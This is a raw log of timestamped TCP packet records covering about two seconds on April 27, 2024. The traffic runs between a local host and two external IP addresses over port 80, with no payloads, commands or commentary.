Apr 27, 2024 02:19:12.727049112 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:12.727112055 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:12.775437117 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:12.775484085 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:12.775535107 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:12.775542021 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:12.775594950 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:12.775594950 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:12.775751114 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:12.775799036 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:12.775808096 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:12.775850058 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:12.776052952 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:12.776065111 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:12.776118994 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:12.776118994 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:12.777687073 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:12.786137104 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:12.798230886 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:12.798295021 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:12.798336983 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:12.798340082 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:12.798352003 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:12.798389912 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:12.826437950 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:12.826519012 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:12.826600075 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:12.826673985 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:12.841403008 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:12.841470003 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:12.841496944 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:12.841535091 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:12.841609955 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:12.841612101 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:12.841722965 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:12.841766119 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:12.841880083 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:12.841922045 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:12.841962099 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:12.842055082 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:12.884572029 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:12.884610891 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:12.884644985 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:12.897506952 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:12.897521973 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:12.897583008 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:12.898488998 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:12.898555994 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:12.898964882 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:12.899049044 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:12.946909904 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:12.947009087 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:12.947040081 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:12.947096109 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:12.947115898 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:12.947164059 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:12.947428942 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:12.947485924 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:12.972049952 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:12.972131014 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:12.992959023 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:12.993033886 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:12.993115902 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:12.993124962 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:12.993207932 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:12.993284941 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:12.996871948 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:12.996936083 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:13.037287951 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:13.037302971 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:13.037314892 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:13.037355900 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:13.037383080 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:13.037415028 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:13.037568092 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:13.037616014 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:13.037628889 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:13.037641048 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:13.037663937 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:13.037692070 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:13.069742918 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:13.069756985 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:13.069814920 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:13.080265045 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:13.080576897 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:13.080638885 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:13.080674887 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:13.093188047 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:13.093249083 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:13.093316078 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:13.093327045 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:13.093381882 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:13.117006063 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:13.117069960 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:13.117130041 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:13.117140055 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:13.117172956 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:13.117187023 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:13.117189884 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:13.117234945 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:13.117445946 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:13.117497921 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:13.117527008 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:13.117573023 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:13.167418957 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:13.167973995 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:13.168123960 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:13.188905001 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:13.188930035 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:13.188968897 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:13.190812111 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:13.190824986 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:13.190864086 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:13.231394053 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:13.231465101 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:13.231499910 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:13.231512070 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:13.231524944 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:13.231575012 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:13.231607914 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:13.231633902 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:13.231647015 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:13.231668949 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:13.231704950 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:13.231717110 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:13.275022984 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:13.275084019 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:13.275119066 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:13.288302898 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:13.288327932 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:13.288347960 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:13.288398981 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:13.288398981 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:13.288551092 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:13.288563967 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:13.288588047 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:13.288619995 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:13.288640976 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:13.288644075 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:13.288697004 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:13.288738012 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:13.288741112 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:13.288785934 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:13.340152025 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:13.340221882 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:13.371458054 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:13.384404898 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:13.384520054 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:13.384567976 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:13.385998011 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:13.386105061 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:13.386157036 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:13.426961899 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:13.426997900 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:13.427067995 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:13.427107096 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:13.427119970 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:13.427131891 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:13.427144051 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:13.427165985 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:13.427196980 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:13.427211046 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:13.427227020 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:13.427272081 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:13.460556030 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:13.460645914 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:13.460678101 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:13.460757971 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:13.460781097 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:13.460833073 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:13.460972071 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:13.461040020 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:13.461112022 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:13.461167097 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:13.470650911 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:13.470737934 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:13.470791101 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:13.470817089 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:13.483520031 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:13.483576059 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:13.483608007 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:13.483692884 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:13.483737946 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:13.483736992 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:13.510659933 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:13.510744095 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:13.510987043 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:13.511049986 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:13.566096067 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:13.566175938 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:13.579694033 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:13.579716921 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:13.579782009 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:13.580882072 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:13.580895901 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:13.580960035 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:13.621603012 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:13.621663094 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:13.621679068 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:13.621711016 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:13.621721029 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:13.621763945 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:13.621848106 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:13.621864080 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:13.621893883 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:13.621918917 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:13.621938944 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:13.621993065 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:13.627724886 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:13.631964922 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:13.631978989 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:13.632055998 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:13.632112980 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:13.666377068 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:13.666414976 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:13.666465998 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:13.677961111 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:13.678050041 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:13.678136110 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:13.678139925 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:13.678152084 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:13.678251028 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:13.682102919 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:13.682137012 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:13.682172060 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:13.682204962 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:13.682208061 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:13.682259083 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:13.761009932 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:13.761066914 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:13.761126041 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:13.774919033 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:13.774987936 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:13.775044918 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:13.775966883 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:13.776029110 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:13.776068926 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:13.804876089 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:13.804977894 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:13.817172050 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:13.817202091 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:13.817214012 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:13.817265034 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:13.817317009 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:13.817361116 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:13.817615032 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:13.817718029 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:13.817770958 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:13.817801952 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:13.817847013 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:13.817894936 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:13.852763891 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:13.852792978 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:13.852838993 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:13.852873087 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:13.852974892 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:13.853009939 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:13.853022099 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:13.853050947 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:13.853050947 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:13.853104115 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:13.870033026 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:13.870098114 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:13.870155096 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:13.874424934 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:13.874517918 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:13.874577045 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:13.874610901 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:13.874691010 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:13.874732971 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:13.956581116 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:13.956720114 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:13.956774950 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:13.970083952 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:13.970124960 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:13.970218897 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:13.971101999 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:13.971116066 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:13.971174955 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:13.975378036 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:13.975523949 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:14.012701035 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:14.012715101 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:14.012747049 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:14.012775898 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:14.012784958 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:14.012837887 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:14.013044119 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:14.013088942 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:14.013130903 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:14.013226986 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:14.013241053 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:14.013293028 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:14.024008989 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:14.024036884 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:14.024050951 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:14.024085999 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:14.024112940 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:14.024130106 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:14.024146080 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:14.024166107 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:14.024188042 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:14.024189949 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:14.024238110 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:14.064764977 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:14.064929008 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:14.064943075 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:14.065026999 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:14.069061041 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:14.069075108 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:14.069130898 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:14.069139004 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:14.069153070 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:14.069175959 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:14.146975994 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:14.147097111 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:14.153477907 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:14.153568983 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:14.153624058 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:14.166898966 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:14.166981936 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:14.167129993 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:14.167881966 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:14.167942047 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:14.168052912 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:14.194489956 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:14.194575071 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:14.194582939 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:14.194608927 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:14.194637060 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:14.194655895 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:14.194669962 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:14.194730997 CEST	49733	80	192.168.2.4	185.172.128.76
